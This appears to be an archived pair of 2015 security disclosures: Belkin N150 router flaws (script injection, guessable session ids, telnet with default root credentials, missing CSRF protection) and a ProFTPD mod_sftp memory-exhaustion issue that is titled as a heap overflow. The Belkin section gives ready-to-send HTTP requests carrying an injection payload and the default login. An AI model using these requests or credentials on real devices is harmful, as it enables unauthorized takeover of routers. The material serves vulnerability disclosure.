##Full Disclosure:#Exploit Title      : Belkin N150 Wireless Home Router MultipleVulnerabilities#Exploit Author     : Rahul Pratap Singh#Date               : 30/Nov/2015#Home Page Link     : http://www.belkin.com#Blog Url           : 0x62626262.wordpress.com#Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
#Status             : Not Patched→ Vulnerability/BUG Report :1)• Vulnerability Title  :  HTML/Script Injection• Version              :  F9K1009 v1• Firmware             :  1.00.09→ Proof of Concept:"InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_
Language" this parameter isvulnerable.https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/→ Steps to Reproduce:Send the following post request using Burpsuite,etcPOST /cgi-bin/webproc HTTP/1.1Host: 192.168.2.1User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Referer:http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMTConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 260%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D2)• Vulnerability Title  :  Session Hijacking• Version              :  F9K1009 v1• Firmware             :  1.00.09→ Proof of Concept:Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMTsessionid is allocated using hex encoding and of fixed length i.e 8 .Therefore, it is very easy to bruteforce it in feasible amount for timeas this session id ranges from 00000000 to ffffffff→ Steps to Reproduce:Send the following request using Burpsuite and Bruteforce the sessionid.POST /cgi-bin/webproc HTTP/1.1Host: 192.168.2.1User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Referer:http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT3)• Vulnerability Title  :  Telnet Enabled with Default Pass• Version              :  F9K1009 v1• Firmware             :  1.00.09→ Vulnerability Details:Telnet protocol can be used by an attacker to gain remote access to therouter with root privileges.→ Proof of Concept:https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/→ Steps to Reproduce:1) Open terminal2) Type following command:        telnet 192.168.2.13) Default user and pass is root:root4)• Vulnerability Title  :  Cross Site Request Forgery• Version              :  F9K1009 v1• Firmware             :  1.00.09→ Proof of Concept:Request doesn't contain any CSRF-token. Therefore, requests can beforged. It can be verified with any request.Status:Vendor Notified: 20 Oct 2015Vendor Notified Again: 25 Nov 2015No Response.Ref:https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
 
 
 
===============================================                              Date: 29/11/2015                      Credit: Nicholas Lemonias             .::PROFTPD  v1.3.5a  HEAP OVERFLOWS ::.ADVANCED INFORMATION SECURITY CORPORATION                                                    Keeping Things Simple!==============================
========================                  .88888888:.                 88888888.88888.               .8888888888888888.               888888888888888888               888' _`888'_  `88888               888 888 888  88888               888_888_::_888_:888               888:::,::,:::::8888               888`:::::::::'`8888              .888  `::::'    8:88.             8888            `8:888.           .8888'             `888888.          .8888:..  .::.  ...:'8888888:.         .8888.'     :'     `'::`88:88888        .8888        '         `.888:8888.       888:8         .           888:88888     .888:88        .:           888:88888:     8888888.       ::           88:888888     `.::.888.      ::          .88888888    .::::::.888.    ::         :::`888'.:.   ::::::::::.888   '         .::::::::::::   ::::::::::::.8    '      .:8::::::::::::..::::::::::::::.        .:888::::::::::::::::::::::::::::888:.__..:88888:::::::::::'   `'.:::::::::::88888888888.888:::::::::'         `':::_:' -- '' -'-' `':_::::'`. w00t! w00t! w00t!        ~  Keeping Things Simple! ==================INTRODUCTION ================== ProFTPD is Free and open-source software, compatible with Unix-like systems and Microsoft Windows (via Cygwin). Along with vsftpd and Pure-FTPd, ProFTPD is among the most popular FTP servers in Unix-like environments today. Compared to those, which focus e.g. on simplicity, speed or security, ProFTPD's primary design goal is to be a highly feature rich FTP server, exposing a large amount of configuration options to the user ==================================================== Description: During a manual source code audit of ProFTPD latest, various security issues were discovered. [3] ================================================================================CODE SNIPPET (PoC 1)=========================== ../../mod_sftp/fxp.c:1217-1251static struct fxp_extpair *fxp_msg_read_extpair(pool *p, unsigned char **buf,    uint32_t *buflen) {  uint32_t namelen, datalen;  unsigned char *name, *data;  struct fxp_extpair *extpair;  namelen = sftp_msg_read_int(p, buf, buflen);  if (*buflen < namelen) {    (void) pr_log_writefile(sftp_logfd, MOD_SFTP_VERSION,      "SFTP message format error: unable to read %lu bytes of extpair name "      "data (buflen = %lu)", (unsigned long) namelen, (unsigned long) *buflen);    SFTP_DISCONNECT_CONN(SFTP_SSH2_DISCONNECT_BY_APPLICATION, NULL);  }  name = palloc(p, namelen + 1);  memcpy(name, *buf, namelen);  (*buf) += namelen;  (*buflen) -= namelen;  name[namelen] = '\0';  datalen = sftp_msg_read_int(p, buf, buflen);  if (datalen > 0) {    data = sftp_msg_read_data(p, buf, buflen, datalen);  } else {    data = NULL;  }  extpair = palloc(p, sizeof(struct fxp_extpair));  extpair->ext_name = (char *) name;  extpair->ext_datalen = datalen;  extpair->ext_data = data;  return extpair;}=====================RATIONALE=====================Part of the SFTP handshake involves "extensions", which are key/valuepairs, comprised of strings.  In SSH, strings are encoded for networktransport as a 32-bit length, followed by the bytes.The mod_sftp module has no manual bounds/length metrics / limitationswhen reading SFTP extension key/value data from the network.  A malicious attacker might attempt to encode large values, andallocate more memory than is necessary, resulting in uncontrollablememory exhaustion / and resource consumption.=======================CONCLUSION=======================To avoid undue resource exhaustion by a remote client, mod_sftp shouldinclude a patch on the maximum length of acceptable extensionkeys/values, as reported by our earlier Proftpd report.REPORT TIMELINE==============================22/11/2015  Reported to vendor. (Initial Report)  [3]25/11/2015  Second report to vendor.29/11/2015  Bug Report / Patch circulation.Big thanks to TJ from Proftpd for the prompt response to the issue,and excellent cooperation in security. ============================== ACKNOWLEDGEMENTS ==============================PacketStorm SecurityTEAM TESO, w00w00, Netric, b0iler (eyeonsecurity), wootehfoot,badpack3t (SP), Vandal (Vic), s0kket, mantis, Big_Al , ELFQrin, bob(dtors),  epic, RaT  for their ~ legendary mark.====================REFERENCES====================[1]  Proftpd. 2015. Proftpd Bug Report , MOD_SFTP Bug Report.[ONLINE] Available at:http://bugs.proftpd.org/show_bug.cgi?id=4210. [Accessed 29 November 2015].[2] Lemonias, N. (2015). SecurityFocus - Proftpd Heap Overflow.[ONLINE] Securityfocus.com.  Available at:http://www.securityfocus.com/archive/1/536953/30/0/threaded[Accessed 29 November 2015].[3] Cnvd.org.cn, (2015). China's Emergency Response Team, Proftpd1.3.5a report - CERT.[online] Available at:http://www.cnvd.org.cn/flaw/show/CNVD-2015-07798 [Accessed 30 Nov.2015].